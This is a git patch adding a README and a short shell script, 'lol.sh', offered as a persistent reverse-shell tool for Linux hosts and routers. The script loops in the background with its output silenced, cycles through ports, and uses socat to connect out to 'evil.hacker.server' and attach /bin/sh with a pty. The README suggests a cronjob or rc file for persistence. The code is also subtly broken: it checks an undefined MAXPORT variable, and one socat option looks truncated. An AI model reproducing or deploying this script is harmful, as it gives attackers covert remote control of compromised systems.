From 05923f8021e921a52822c98b6fcd7167073169eb Mon Sep 17 00:00:00 2001 From: kayos Date: Sun, 18 Oct 2020 13:22:17 -0700 Subject: [PATCH] sup --- README.md | 22 ++++++++++++++++++++++ lol.sh | 28 ++++++++++++++++++++++++++++ 2 files changed, 50 insertions(+) create mode 100644 README.md create mode 100644 lol.sh diff --git a/README.md b/README.md new file mode 100644 index 0000000..6da3f07 --- /dev/null +++ b/README.md @@ -0,0 +1,22 @@ +# shell-me-bro +###### for popping shells and shit idk what do you want me to say + +--- + +- pops shells on penguin computers +- for some reason puts a file in /tmp/ indicating the port it's trying? +- tends to stay running in the background (annoyingly) +- made sense at the time +- works on like routers and shit (if you have socat bin) +- idk stick it in a cronjob or an rc file or some shit + +--- + +have you ever been doing evil hacker things and you manage to fuck yourself out of a shell like over 9,000 times and you can't upgrade to a proper pty because the target is an old ladies wristwatch on some stupid architecture that doesn't do anything you want it to? + +*say goooooodbye to that bullshit* + +decades of intense research have went into this, idk, like 12 line script that i wrote + +i spent more time on this readme.md than this script but i'll maybe do more things in this repo who knows + diff --git a/lol.sh b/lol.sh new file mode 100644 index 0000000..889aace --- /dev/null +++ b/lol.sh @@ -0,0 +1,28 @@ +# idk man it like runs in the background and +# like pops shells or some shit +# and cycles up through ports + +# it works on like routers or whatever +# you need socat and stuff + +######Config#### +STARTPORT=105 +ENDPORT=115 +TIMEOUT=90 +HOST=evil.hacker.server +################ +PORT=$STARTPORT +while true; +do + find /tmp/ -iname "*.prt" -exec rm {} \; + touch /tmp/a${PORT}.prt + if [[ $PORT != $MAXPORT ]] + then + PORT=$((PORT+1)) + else + PORT=$STARTPORT + fi + sleep 8 + /tmp/socat -T ${TIMEOUT} tcp-connect:${HOST}:${PORT} exec:/bin/sh,pty,stde +done &>/dev/null& +